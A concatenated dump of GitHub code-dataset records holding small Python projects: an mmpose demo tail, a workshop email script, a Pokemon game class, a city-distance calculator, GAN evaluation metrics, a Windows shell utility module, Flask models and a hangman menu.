help='Visualize the predicted heatmap')\n parser.add_argument(\n '--show-kpt-idx',\n action='store_true',\n default=False,\n help='Whether to show the index of keypoints')\n parser.add_argument(\n '--kpt-thr', type=float, default=0.3, help='Keypoint score threshold')\n parser.add_argument(\n '--radius',\n type=int,\n default=3,\n help='Keypoint radius for visualization')\n parser.add_argument(\n '--thickness',\n type=int,\n default=1,\n help='Link thickness for visualization')\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = parse_args()\n assert args.show or (args.output_root != '')\n assert args.input != ''\n if args.output_root:\n mmengine.mkdir_or_exist(args.output_root)\n if args.save_predictions:\n assert args.output_root != ''\n args.pred_save_path = f'{args.output_root}/results_' \\\n f'{os.path.splitext(os.path.basename(args.input))[0]}.json'\n\n # build the model from a config file and a checkpoint file\n if args.draw_heatmap:\n cfg_options = dict(model=dict(test_cfg=dict(output_heatmaps=True)))\n else:\n cfg_options = None\n\n model = init_model(\n args.config,\n args.checkpoint,\n device=args.device,\n cfg_options=cfg_options)\n\n # init visualizer\n model.cfg.visualizer.radius = args.radius\n model.cfg.visualizer.line_width = args.thickness\n visualizer = VISUALIZERS.build(model.cfg.visualizer)\n visualizer.set_dataset_meta(model.dataset_meta)\n\n input_type = mimetypes.guess_type(args.input)[0].split('/')[0]\n if input_type == 'image':\n pred_instances = process_one_image(\n args, args.input, model, visualizer, show_interval=0)\n pred_instances_list = split_instances(pred_instances)\n\n elif input_type == 'video':\n tmp_folder = tempfile.TemporaryDirectory()\n video = mmcv.VideoReader(args.input)\n progressbar = mmengine.ProgressBar(len(video))\n video.cvt2frames(tmp_folder.name, show_progress=False)\n output_root = args.output_root\n args.output_root = tmp_folder.name\n pred_instances_list = []\n\n for frame_id, img_fname in enumerate(os.listdir(tmp_folder.name)):\n pred_instances = process_one_image(\n args,\n f'{tmp_folder.name}/{img_fname}',\n model,\n visualizer,\n show_interval=1)\n progressbar.update()\n pred_instances_list.append(\n dict(\n frame_id=frame_id,\n instances=split_instances(pred_instances)))\n\n if output_root:\n mmcv.frames2video(\n tmp_folder.name,\n f'{output_root}/{os.path.basename(args.input)}',\n fps=video.fps,\n fourcc='mp4v',\n show_progress=False)\n tmp_folder.cleanup()\n\n else:\n args.save_predictions = False\n raise ValueError(\n f'file {os.path.basename(args.input)} has invalid format.')\n\n if args.save_predictions:\n with open(args.pred_save_path, 'w') as f:\n json.dump(\n dict(\n meta_info=model.dataset_meta,\n instance_info=pred_instances_list),\n f,\n indent='\\t')\n print(f'predictions have been saved at {args.pred_save_path}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ShirleyMaxx/ChimpACT","sub_path":"mmpose/demo/bottomup_demo.py","file_name":"bottomup_demo.py","file_ext":"py","file_size_in_byte":5571,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"39"} +{"seq_id":"28471552796","text":"import csv\r\n\r\nACCEPTED_MSG = \"\"\"\r\nHi {},\r\n\r\nWe are thrilled to let you know that you are accepted to our programming workshopself.\r\n\r\nYour coach is {}.\r\n\r\nThank you,\r\nOrganizers\r\n\"\"\"\r\n\r\nREJECTED_MSG = \"\"\"\r\nHi {},\r\n\r\nWe are very sorry to let you know that due to a big number of applications\r\nwe couldn't fit you at the workshop this time.\r\n\r\nThank you,\r\nOrganizers\r\n\"\"\"\r\n\r\n# csv_file = open('python_test_spreadsheet.csv')\r\nwith open('python_test_spreadsheet.csv') as csv_file:\r\n csv_reader = csv.reader(csv_file, delimiter=',')\r\n next(csv_reader) # to skip the fist row since it just contains the heading of each column\r\n\r\n for row in csv_reader:\r\n name, email, accepted, coach, language = row\r\n # print(name, email, accepted, coach, language)\r\n\r\n if accepted == \"yes\":\r\n msg = ACCEPTED_MSG.format(name, coach)\r\n else:\r\n msg = REJECTED_MSG.format(name)\r\n print(\"Send email to: {}\".format(email))\r\n print(\"Email content:\")\r\n print(msg)\r\n\r\n# csv_file.close() # not required for \"with open('filename')\"\r\n","repo_name":"sidmen/python","sub_path":"basics_and_misc/spreadsheet.py","file_name":"spreadsheet.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15556607154","text":"import json\n\nimport requests\nimport json\n\nURL = \"http://127.0.0.1:8000/per_create/\"\n\ndata = {\n 'name': 'Mary',\n 'surname': 'Johnson',\n 'city':'Greenwood',\n 'state':'Indiana',\n 'country':'USA'\n\n}\njson_data = json.dumps(data)\nr = requests.post(url = URL, data = json_data)\ndata = r.json\nprint(data)\n","repo_name":"Anushka11mindbowser/django-practice","sub_path":"myapp.py","file_name":"myapp.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74349719792","text":"'''\nWe will have two classes to import\n\nObviously, there is the Pokemon class...\n\nBut we also need a Candy class for the candy amounts\nSince each pokemon uses its lowest evolution for the candy\n\nTherefore, multiple pokemon of different higher evolutions will all use the same candy\n'''\nclass Candy:\n # Initialize the family, and then the count to 0\n def __init__(self, family, count=0):\n self.family = family\n self.count = count\n \n # Add candy method\n def add(self, amount):\n self.count += amount\n \n # We will use a classmethod that acts on the whole class instead of only the 'self' object, since multiple objects will be under this one class\n @classmethod\n # And so to create the candy for the family\n def create_for_family(cls, family): # Class method used to intialize candy object for certain family\n # We will return the class with family and count\n return cls(family, count=0)\n\nclass Pokemon:\n \n # Before the __init__ we need to find other information about a given pokemon\n def find_in_names(self, pokemon_names):\n x = 0\n for i in pokemon_names:\n y = 0\n for j in i:\n if self.get_name() == j:\n break\n y += 1\n if self.get_name() == j:\n break\n x += 1\n return [x,y]\n\n # Initialize all our variables\n def __init__(self, name, typ, cp, family, randomstats, isShiny, pokemon_names):\n self.name = name\n self.type = typ\n self.cp = cp\n self.stats = randomstats\n # Calculate IV given random initial stats\n self.iv = round((sum(randomstats)/45)*100, 1)\n self.shiny = isShiny\n self.family = family\n self.candy = Candy(family)\n self.candy_powerup = 2\n self.stardust_powerup = 1900\n # Unpack family and evolution from the method above\n x,y = self.find_in_names(pokemon_names)\n self.candy_evolve = 25 * (y+1)\n self.power_up_level = 0\n self.number_of_battles_won = 0\n\n # Accessor methods\n\n def get_name(self):\n return self.name\n \n def get_type(self):\n return self.type\n\n def get_cp(self):\n return self.cp\n\n def get_stats(self):\n return self.stats\n\n def get_iv(self):\n return self.iv\n\n def get_shiny(self):\n return self.shiny\n\n def get_candy_powerup(self):\n return self.candy_powerup\n\n def get_stardust_powerup(self):\n return self.stardust_powerup\n\n def get_candy_evolve(self):\n return self.candy_evolve\n \n def get_number_of_battles_won(self):\n return self.number_of_battles_won\n\n def get_shiny_text(self):\n x = self.get_shiny()\n if x == True:\n return \"\\033[1;33mYES!\\033[0m\"\n else:\n return \"No\"\n \n # Method to check if there does exist a higher evolution of the pokemon\n def canEvolve(self, pokemon_names):\n x,y = self.find_in_names(pokemon_names)\n if y+1 < len(pokemon_names[x]):\n return True\n else:\n return False\n \n # Stat and cost display method\n def display_attributes(self, inventory, pokemon_names, fight=False):\n print(f\"\\nName: {self.get_name()}\")\n print(f\"Type: {self.get_type()}\")\n print(f\"Combat Power: {self.get_cp()}\")\n x = self.get_stats(); print(f\"Stats: {x[0]} Attack, {x[1]} Defense, {x[2]} Stamina\")\n print(f\"IV: {self.get_iv()}%\")\n print(f\"Number of battles won: {self.get_number_of_battles_won()}\")\n # Print shiny state with ANSI colouring\n x = self.get_shiny()\n if x == True:\n print(f\"Shiny?: \\033[1;33mYES!\\033[0m\")\n else:\n print(\"Shiny?: No\")\n\n # Then print costs if this method is not called for a hostile pokemon\n if fight == False:\n print(f\"\\nCosts:\")\n\n # With green and red to check if the player can do it\n green = '\\033[32m'\n red = '\\033[31m'\n\n def powerup_msg(colour):\n print(f\"{colour}You need {self.get_candy_powerup()} {self.family} candies and {self.get_stardust_powerup()} stardust to power up this pokemon.\\033[0m\")\n def evolve_msg(colour):\n print(f\"{colour}You need {self.get_candy_evolve()} {self.family} candies to evolve this pokemon.\\033[0m\")\n\n if inventory[2] >= self.get_stardust_powerup() and inventory[1][self.family].count >= self.get_candy_powerup():\n powerup_msg(green)\n else:\n powerup_msg(red)\n \n if self.canEvolve(pokemon_names):\n if inventory[1][self.family].count >= self.get_candy_evolve():\n evolve_msg(green)\n else:\n evolve_msg(red)\n \n # Power up method\n\n # Essentially checks if player has enough, and powers pokemon up, removing the costs from the inventory\n\n def power_up(self, inventory, cp_increase, stats_chance, possible_increment):\n if inventory[2] >= self.get_stardust_powerup() and inventory[1][self.family].count >= self.get_candy_powerup():\n # Note: only powers up 10 times\n if self.power_up_level < 10:\n self.power_up_level += 1\n inventory[2] -= self.stardust_powerup\n old = self.cp\n self.cp += int(round(cp_increase*(1-(self.power_up_level/10))))\n print(f\"\\n{self.get_name()}'s CP increased by {self.cp - old}!\")\n # Costs increase\n # Stardust increases 300 each time\n self.stardust_powerup += 300\n # And candy increasing 1 every 3 powerups\n if self.power_up_level % 3 == 0:\n self.candy_powerup += 1\n # Also a 50% chance to increase stats on a power up\n if stats_chance < 50:\n self.stats = possible_increment\n print(f\"{self.get_name()}'s stats have also evolved!\")\n self.iv = round((sum(self.get_stats())/45)*100, 1)\n else:\n print(\"\\nThis pokemon has been powered up a maximum of 10 times.\")\n else:\n print(f\"\\nYou either do not have enough stardust or {self.family} candies to power up this pokemon!\")\n\n # Evolve method\n # Essentially checks if it can evolve, and subtracts costs\n # Where it then takes increments and adds it to stats\n # Then prints out results\n def evolve(self, inventory, pokemon_names, pokemon_types, cp_increase, stats_increment):\n if self.canEvolve(pokemon_names):\n if inventory[1][self.family].count >= self.get_candy_evolve():\n inventory[1][self.family].count -= self.get_candy_evolve()\n self.candy_evolve = self.candy_evolve * 2\n x, y = self.find_in_names(pokemon_names)\n old_name = self.name\n old_type = self.type\n self.name = pokemon_names[x][y+1]\n self.type = pokemon_types[x][y+1]\n self.power_up_level = 0\n old_cp = self.cp\n self.cp += cp_increase\n self.stats = stats_increment\n self.iv = round((sum(self.get_stats())/45)*100, 1)\n print(f\"Your {old_name} ({old_type}) evolved into a {self.name} ({self.type})! \")\n print(f\"\\n{self.get_name()}'s CP increased by {self.cp-old_cp}!\")\n x = self.get_stats(); print(f\"It's new stats are: {x[0]} Attack, {x[1]} Defense, {x[2]} Stamina\")\n else:\n print(f\"\\nYou do not have enough {self.family} candies!\")\n else:\n print(\"\\nThis pokemon cannot evolve any further.\")\n\n # Catch method\n def catch(self, inventory, random):\n # Adds object to first list in inventory\n inventory[0].append(self)\n # And adds candy to candydict\n family = self.family\n if family not in inventory[1]: # If this is the first time this family is being caught\n inventory[1][family] = Candy.create_for_family(family)\n # And adds a random amount of candy\n inventory[1][family].add(random)","repo_name":"ahmedkhaleel2004/Py-kemon-Go","sub_path":"Pokemon_class.py","file_name":"Pokemon_class.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"23156645324","text":"import argparse\nimport pandas as pd\nimport random\nfrom math import radians, degrees, sin, cos, asin, acos, sqrt\nimport numpy as np\ntry:\n from itertools import izip as zip\nexcept ImportError:\n pass\n\ndef great_circle(lon1, lat1, lon2, lat2):\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n return 6371 * (\n acos(sin(lat1) * sin(lat2) + cos(lat1) * cos(lat2) * cos(lon1 - lon2))\n )\n\n\ndef print_result(df):\n global index, row, average_dist, df_closest\n for index, row in df.iterrows():\n print(row['city1'], row['city2'], str(row['distance']) + \"Km\")\n average_dist = np.average(df['distance'])\n df_closest = df.iloc[\n (df['distance'] - average_dist).abs().argsort()[:1]]\n print(\"Average distance: {0}km. Closest pair: {1} - {2} {3}km\".format(average_dist, df_closest['city1'].tolist()[0],\n df_closest['city2'].tolist()[0],\n df_closest['distance'].tolist()[0]))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"Description for my parser\")\n parser.add_argument(\"-n\", \"--n\", help=\"Example: Help argument\", required=False, default=\"\")\n argument = parser.parse_args()\n data = pd.read_csv(\"coordinates.csv\", header=0)\n iterat = data.iterrows()\n result = pd.DataFrame(columns=[\"city1\", \"city2\", \"distance\"])\n result_no_argument = pd.DataFrame(columns=[\"city1\", \"city2\", \"distance\"])\n\n if argument.n != '':\n random_indices = random.sample(range(0,10), int(argument.n))\n for i in range(1, len(random_indices)):\n result.loc[i-1] = [data.iloc[i-1][0], data.iloc[i][0], great_circle(data.iloc[i-1][1], data.iloc[i-1][2], data.iloc[i][1], data.iloc[i][2])]\n sorted_df = result.sort_values('distance')\n print_result(sorted_df)\n else:\n lst = []\n for id1, id2 in zip(data.iterrows(), data.iloc[1:].iterrows()):\n lst.append([id1[1]['Name'], id2[1]['Name'],\n great_circle(id1[1]['Latitude'], id1[1]['Longitude'], id2[1]['Latitude'],\n id2[1]['Longitude'])])\n df = pd.DataFrame(lst, columns=[\"city1\", \"city2\", \"distance\"])\n result_no_argument = result_no_argument.append(df)\n sorted_result_no_argument = result_no_argument.sort_values('distance')\n sorted_result_no_argument = sorted_result_no_argument.drop_duplicates()\n print_result(sorted_result_no_argument)","repo_name":"raghupalakodetyFRA/AirmineTask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"6977780296","text":"# 이코테 음료수 얼려 먹기\nimport sys\ninput = sys.stdin.readline\n\n# N: 얼음틀의 세로 길이\n# M: 얼음틀의 가로 길이\nN, M = map(int, input().split())\n\n# 전체 얼음틀 정보 \ngraph = []\nfor _ in range(N):\n graph.append(list(map(int, input().split)))\n \n \ndef dfs(x, y):\n if x < 0 or x >= N or y < 0 or y >= M:\n return False\n if graph[x][y] == 0: # 뚫려있는 부분\n graph[x][y] = 1 # 방문 여부 업데이트 \n dfs(x - 1, y)\n dfs(x + 1, y)\n dfs(x, y + 1)\n dfs(x, y - 1)\n return True\n return False\n\n\nresult = 0\nfor i in range(M):\n for j in range(N):\n if dfs(i, j):\n result += 1\n \n \nprint(result)\n","repo_name":"youngeun-dev/coding-test-practice","sub_path":"python/음료수-얼려-먹기.py","file_name":"음료수-얼려-먹기.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"70287241713","text":"#!/usr/bin/python\n\nimport sys\nimport math\n\ng = float(sys.argv[1])\nr = float(sys.argv[2])\n\n#v_escape = 0\n#r_metros = 0\n#if g == 9.8 and r == 6371: # Datos de la tierra\nr_metros = r*1000\nv_escape = math.sqrt(2*g*r_metros)\n\nprint (\"velocidad: {}\".format(v_escape))\n","repo_name":"jfgomezponce/Data-Science-DesafioLatam","sub_path":"1-Introduccion_a_la_Programacion/S1_M-11_J-13_Junio_2019_Introduccion_a_la_Programacion/Desafio_Semana_1_M-11/Desafio_Velocidad/escape.py","file_name":"escape.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"4991989923","text":"import numpy as np\nfrom scipy.stats import multivariate_normal\n\n\ndef gaussian_NLPD(y_real, y_pred, cov):\n nll = -np.mean(\n [multivariate_normal.logpdf(x=y_real[i], mean=y_pred[i], cov=cov[i]) for i in range(len(y_pred))])\n return nll\n\n\ndef Parzen_NLPD(yTrue, yPred, bw):\n n_instances = yTrue.shape[0]\n nlpd = np.zeros((n_instances))\n for i in range(n_instances):\n n_samples = yPred[i].shape[0]\n yt = np.tile(yTrue[i], n_samples)\n\n E = -0.5 * np.power((yt - yPred[i].flatten()) / bw, 2)\n\n max_exp = np.max(E, axis=-1, keepdims=True)\n\n max_exp_rep = np.tile(max_exp, n_samples)\n exp_ = np.exp(E - max_exp_rep)\n\n constant = 0.5 * np.log(2 * np.pi) + np.log(n_samples * bw)\n nlpd[i] = -np.log(np.sum(exp_)) - max_exp + constant\n return np.mean(nlpd)\n\n\ndef Parzen(regcgan, x, y, n_sampling=100, n_bands=100):\n n_instance = x.shape[0]\n ypred_list = []\n for i in range(n_instance):\n x_ = np.tile(x[i], (n_sampling, 1))\n ypred_ = regcgan.predict(x_)\n ypred_list.append(ypred_)\n return min_Parzen_NLPD(y, np.array(ypred_list), n_bands)\n\n\ndef min_Parzen_NLPD(yTrue, yPred, n_bands=100):\n windows = np.linspace(0.01, 5, n_bands)\n nlpd = []\n for bw in windows:\n nlpd.append(Parzen_NLPD(yTrue, yPred, bw))\n inx = np.argmin(np.asarray(nlpd))\n return nlpd[inx], windows[inx], nlpd\n\n\ndef Parzen_test(regcgan, X, y, bw, n_sampling=10):\n n_instance = X.shape[0]\n ypred_list = []\n for i in range(n_instance):\n x_ = np.tile(X[i], (n_sampling, 1))\n ypred_ = regcgan._make_predict(x_)\n ypred_list.append(ypred_)\n return Parzen_NLPD(y, np.array(ypred_list), bw)\n","repo_name":"zhongsheng-chen/RegCGAN","sub_path":"metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"9737601842","text":"#Code by Sergio1260\r\n\r\nfrom subprocess import check_output\r\nfrom sys import path\r\nfrom colors import color\r\n\r\n\r\ndef fixcrdir(fix):\r\n fix=fix.split(\"\\\\\")\r\n return fix[len(fix)-2]\r\n\r\ndef readable(num, suffix=\"B\"):\r\n for unit in [\"\", \"Ki\", \"Mi\", \"Gi\", \"Ti\"]:\r\n if abs(num) < 1024.0:\r\n return f\"{num:3.1f}{unit}{suffix}\"\r\n num /= 1024.0\r\n return f\"{num:.1f}Yi{suffix}\"\r\n\r\ndef mkadlnk(arg):\r\n with open(arg, 'rb') as file:\r\n bytes_data = bytearray(file.read())\r\n bytes_data[0x15] = bytes_data[0x15] | 0x20\r\n with open(arg, 'wb') as file:\r\n file.write(bytes_data)\r\n\r\ndef fixaddr(arg):\r\n from glob import glob\r\n from os.path import isfile\r\n fix=glob(arg, recursive=False)\r\n if not len(fix)==0 and not len(fix)>1:\r\n fix=fix[0]\r\n if not isfile(fix):\r\n try:\r\n ext=str(check_output('cd /D \"'+fix+'\" 2>nul && cd', shell=True), encoding=\"cp437\")\r\n ext=ext[:len(ext)-2]\r\n if not ext[len(ext)-1]==chr(92): ext+=chr(92)\r\n return ext\r\n except: print(color(\"\\n Permision Denied\\n\",\"R\")); return None\r\n else: print(color(\"\\n It isn't a valid directory\\n\",\"R\")); return None\r\n else:\r\n if len(fix)>1: print(color(\"\\n Too many arguments\\n\",\"R\")); return None\r\n else: print(color(\"\\n The dir doesn't exist\\n\",\"R\")); return None\r\n\r\ndef fixfiles(arg):\r\n arg=arg.split(chr(92))\r\n file=arg.pop(); buff=\"\"\r\n for x in arg: buff+=x+chr(92)\r\n arg=fixaddr(buff)\r\n if not arg==None:\r\n return arg+file\r\n else: return \"\"\r\n\r\ndef stdin():\r\n while True:\r\n try:\r\n ext=check_output('powershell read-host', shell=False)\r\n ext=str(ext); ext=ext[2:len(ext)-5]; return ext; break\r\n except: pass\r\n\r\ndef pwdstdin():\r\n file=path[0]+\"\\\\import\\\\powershell\\\\hiddenpwd.ps1\"\r\n fix=\"Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force; \"\r\n ext=check_output(\"powershell \"+fix+file,shell=False)\r\n ext=str(ext); ext=ext[2:len(ext)-5]\r\n return ext\r\n\r\ndef adminname():\r\n ext=str(check_output(\"net localgroup\"))\r\n ext=ext[ext.find(\"-\\\\r\\\\n*\")+6:]\r\n ext=ext[:ext.find(\"\\\\r\\\\n\")]\r\n return ext.lower()\r\n\r\ndef createuserexec():\r\n from link import mklnk\r\n fic=open(path[0]+\"\\\\import\\\\fixcmd\\\\start.cmd\",\"w\")\r\n fic.write(\"@echo off\\ntitle OEPWS shell\\nshift\\nstart /B /WAIT \"+path[0]+\"\\\\Shell.py %*%\")\r\n dirt=path[0]+\"\\\\import\\\\fixcmd\"\r\n mklnk(dirt,\"admin\",dirt+\"\\\\start.cmd\",dirt)\r\n mkadlnk(dirt+\"\\\\admin.lnk\")\r\n\r\n\r\ndef lsusr():\r\n raw=str(check_output(\"net user\",shell=True), encoding=\"cp437\")\r\n raw=raw[raw.find(\"----\\r\")+6:]; fix=[]; raw=raw.split(\"\\r\\n\")\r\n raw.pop(); raw.pop(); raw.pop(); fix=[]\r\n for x in raw:\r\n x=x.split(\" \")\r\n for i in x:\r\n i=i.rstrip().lstrip()\r\n if not i==\"\": fix.append(i)\r\n return fix\r\n\r\ndef lsgrp():\r\n raw=str(check_output(\"net localgroup\",shell=True), encoding=\"cp437\")\r\n raw=raw[raw.find(\"----\\r\")+6:]; fix=[]; raw=raw.split(\"\\n\")\r\n raw.pop(); raw.pop(); raw.pop(); raw.pop(0)\r\n for x in raw: fix.append(x[1:].replace(\"\\n\",\"\"))\r\n return fix\r\n\r\ndef extusr(arg):\r\n for x in lsusr():\r\n if x==arg: return True\r\n return False\r\n\r\ndef extgrp(arg):\r\n for x in lsgrp():\r\n if x==arg:\r\n return True\r\n return False\r\n\r\ndef isadmin():\r\n try: open(\"C:\\\\tmp\",\"w\"); return True\r\n except: return False\r\n \r\n","repo_name":"Sergio00166/OEPWS","sub_path":"windows/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"15479119103","text":"with open('j9.txt', 'r') as f:\r\n s = f.readline()\r\n\r\nk = 0\r\n\r\nfor i in range(0, len(s)//2):\r\n if s[i] == s[len(s)-i-1]:\r\n k += 1\r\n\r\nprint(k)\r\n","repo_name":"SavinVladimir/EGE","sub_path":"Задание - 24/Перебор со сложным условием/02_solution.py","file_name":"02_solution.py","file_ext":"py","file_size_in_byte":155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35445329279","text":"from datetime import datetime\nfrom flask import g, abort\nfrom werkzeug import secure_filename\nimport os\nimport urllib, hashlib\n\nclass Model:\n\n def tablename(self):\n return self.Meta.table\n\n def non_auto_fields(self):\n return [f for f in self.Meta.fields if f not in self.Meta.auto_fields]\n\n def __iter__(self):\n return (getattr(self, col) for col in self.non_auto_fields())\n\n def insert(self, cursor=None):\n if cursor is None:\n cursor = g.cursor\n query = 'INSERT INTO %s (%s) VALUES (%s)' % (\n self.tablename(),\n ','.join(self.non_auto_fields()),\n ','.join(['%s']*len(self.non_auto_fields())))\n\n cursor.execute(query, list(self))\n if self.Meta.pk in self.Meta.auto_fields:\n cursor.execute(\"SELECT LASTVAL() FROM %s\" % self.tablename())\n pk = cursor.fetchone()[0]\n setattr(self, self.Meta.pk, pk)\n\n def update(self, cursor=None):\n if cursor is None:\n cursor = g.cursor\n params = ', '.join([\"{}=%s\".format(field) for field in self.non_auto_fields()])\n cursor.execute(\n \"UPDATE %s SET %s WHERE %s=%%s\" % (self.tablename(), params, self.Meta.pk),\n list(self) + [self.pk]\n )\n\n @property\n def pk(self):\n return getattr(self, self.Meta.pk)\n\n\n @classmethod\n def from_dict(klass, d, is_top=True):\n our_fields = {\n k.split(\".\")[-1]:v for k,v in d.items()\n if k.startswith(klass.tablename(klass) + \".\") or '.' not in k and is_top\n }\n instance = klass(**our_fields)\n for submodel in klass.Meta.foreign_models:\n try:\n submodel_instance = submodel.from_dict(d, is_top=False)\n except Exception as e:\n submodel_instance = None\n print(e)\n setattr(instance, submodel.__name__.lower(), submodel_instance)\n\n return instance\n\n @classmethod\n def star(klass):\n return ','.join(['{0}.{1} AS \"{0}.{1}\"'.format(klass.Meta.table, col) for col in klass.Meta.fields])\n\n\n\nclass Label(Model):\n def __init__(self, id=None, name=None):\n self.id = int(id) if id is not None else None\n self.name = name\n\n\n class Meta:\n fields = ['id', 'name']\n auto_fields = ['id']\n pk = 'id'\n table = 'label'\n foreign_models = []\n\n\nclass User(Model):\n def __init__(self, id=None, username=None, email=None, password=None, created=None, is_admin=False):\n self.id = int(id) if id is not None else None\n self.username = username\n self.email = email\n self.password = password\n if created is None:\n created = datetime.now()\n self.created = created\n self.is_admin = is_admin\n\n def is_authenticated(self):\n return True\n\n def gravatar(self):\n gravatar_url = \"http://www.gravatar.com/avatar/\" + hashlib.md5(self.email.lower().encode('utf-8')).hexdigest() + \"?\"\n gravatar_url += urllib.parse.urlencode({'d':'wavatar', 's':str(100)})\n return gravatar_url\n\n class Meta:\n fields = ['id', \"username\", \"email\", \"password\", \"created\", \"is_admin\"]\n auto_fields = ['id']\n pk = 'id'\n table = 'users'\n foreign_models = []\n\n\nclass AnonymousUser:\n def is_authenticated(self):\n return False\n\n @property\n def is_admin(self):\n return False\n\n @property\n def id(self):\n return -1\n\n\n\nclass Etablissement(Model):\n def __init__(self, id=None, name=None, phone=None, url=None, address_street=None, address_number=None, address_city=None, address_zip=None, latitude=None, longitude=None, created=None, user_id=None, type=None, picture=None, *args, **kwargs):\n self.id = int(id) if id is not None else None\n self.name = name\n self.phone = phone\n self.url = url\n self.address_street = address_street\n self.address_number = address_number\n self.address_city = address_city\n self.address_zip = address_zip\n self.latitude = latitude\n self.longitude = longitude\n self.created = created\n self.user_id = user_id\n self.type = type\n self.picture = picture\n\n @classmethod\n def from_form(klass, form, user_id, type):\n instance = klass(\n name=form.name.data,\n phone=form.phone.data,\n url=form.url.data,\n address_street=form.address_street.data,\n address_number=form.address_number.data,\n address_city=form.address_city.data,\n address_zip=form.address_zip.data,\n latitude=form.latitude.data,\n longitude=form.longitude.data,\n created=datetime.now(),\n user_id=user_id,\n type=type,\n )\n return instance\n\n def to_marker(self):\n return {\n \"name\": self.name,\n \"lat\": float(self.latitude),\n \"lon\": float(self.longitude),\n }\n\n def set_picture(self, form_field, files):\n image = files[form_field.name]\n if image:\n image_data = image.read()\n secure = secure_filename(image.filename)\n open('static/media/' + secure, 'wb').write(image_data)\n self.picture = '/static/media/' + secure\n\n def get_picture(self):\n if self.picture:\n return self.picture\n\n if self.type == 'hotel':\n return \"/static/default-hotel.jpg\"\n\n if self.type == 'bar':\n return \"/static/default-bar.jpg\"\n\n if self.type == 'restaurant':\n return \"/static/default-restaurant.jpg\"\n\n def get_url(self):\n if self.type == 'hotel':\n return \"/hotels/\" + str(self.id)\n\n if self.type == 'bar':\n return \"/bars/\" + str(self.id)\n\n if self.type == 'restaurant':\n return \"/restaurants/\" + str(self.id)\n\n class Meta:\n fields = ['id', \"name\", \"phone\", \"url\", \"address_street\", \"address_number\", \"address_zip\", \"address_city\", \"latitude\", \"longitude\", \"created\", \"user_id\", \"type\", \"picture\"]\n auto_fields = ['id']\n pk = 'id'\n table = 'etablissement'\n foreign_models = [User]\n\nclass Hotel(Model):\n def __init__(self, etablissement_id=None, stars=None, rooms=None, price=None, *args, **kwargs):\n self.etablissement_id = etablissement_id\n self.stars = stars\n self.rooms = rooms\n self.price = price\n\n class Meta:\n fields = [\"etablissement_id\", \"stars\", \"rooms\", \"price\"]\n auto_fields = []\n pk = 'etablissement_id'\n table = 'hotel'\n foreign_models = [Etablissement]\n\n\nclass Bar(Model):\n def __init__(self, etablissement_id=None, smoker=None, food=None, *args, **kwargs):\n self.etablissement_id = etablissement_id\n self.smoker = smoker\n self.food = food\n\n class Meta:\n fields = [\"etablissement_id\",\"smoker\",\"food\",]\n auto_fields = []\n pk = 'etablissement_id'\n table = 'bar'\n foreign_models = [Etablissement]\n\n\nclass Restaurant(Model):\n def __init__(self, etablissement_id=None, price_range=None, max_seats=None, takeaway=False, delivery=None, openings=None, *args, **kwargs):\n self.etablissement_id = etablissement_id\n self.price_range = price_range\n self.max_seats = max_seats\n self.takeaway = takeaway\n self.delivery = delivery\n self.openings = openings\n\n class Meta:\n fields = [\"etablissement_id\", \"price_range\", \"max_seats\", \"takeaway\", \"delivery\", \"openings\"]\n auto_fields = []\n pk = 'etablissement_id'\n table = 'restaurant'\n foreign_models = [Etablissement]\n\n\nclass Comment(Model):\n def __init__(self, id=None, user_id=None, etablissement_id=None, date=None, score=None, text=None):\n self.id = int(id) if id is not None else None\n self.user_id = user_id\n self.etablissement_id = etablissement_id\n self.date = date\n self.score = score\n self.text = text\n\n class Meta:\n fields = [\"id\", \"user_id\", \"etablissement_id\", \"date\", \"score\", \"text\"]\n auto_fields = ['id']\n pk = \"id\"\n table = \"comment\"\n foreign_models = [Etablissement, User]\n\n\ndef get_or_404(query, params, model):\n g.cursor.execute(query, params)\n row = g.cursor.fetchone()\n if row is None:\n return abort(404)\n return model.from_dict(row)\n\n\ndef list_of(query, params, model):\n g.cursor.execute(query, params)\n rows = g.cursor.fetchall()\n def map_to_model(r):\n m = model.from_dict(r)\n m.extra = r\n return m\n return [map_to_model(r) for r in rows]\n","repo_name":"C4ptainCrunch/info-h-303","sub_path":"flask/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"32118345291","text":"from functions import randomChoose, startGame, createPlayer, showStats\n\nfrom playsound import playsound\n\nselect = True\n\n#display options menu\nwhile select:\n print(\"\"\"\n === Hangman Game ===\n A: New Game\n B: Quit Game\n C: Player Status\n D: Create New Player\n \"\"\")\n\n playsound('menu.wav')\n\n #ask for user's choice\n select = input(\"Choose an option: \")\n\n#################################################\n\n if select.lower() == \"a\":\n #start new game\n #randomly chooses a word from the list\n randomChoose()\n\n#################################################\n\n if select.lower() == \"b\":\n #end program\n print(\"Exiting program...\")\n playsound('exit.wav')\n 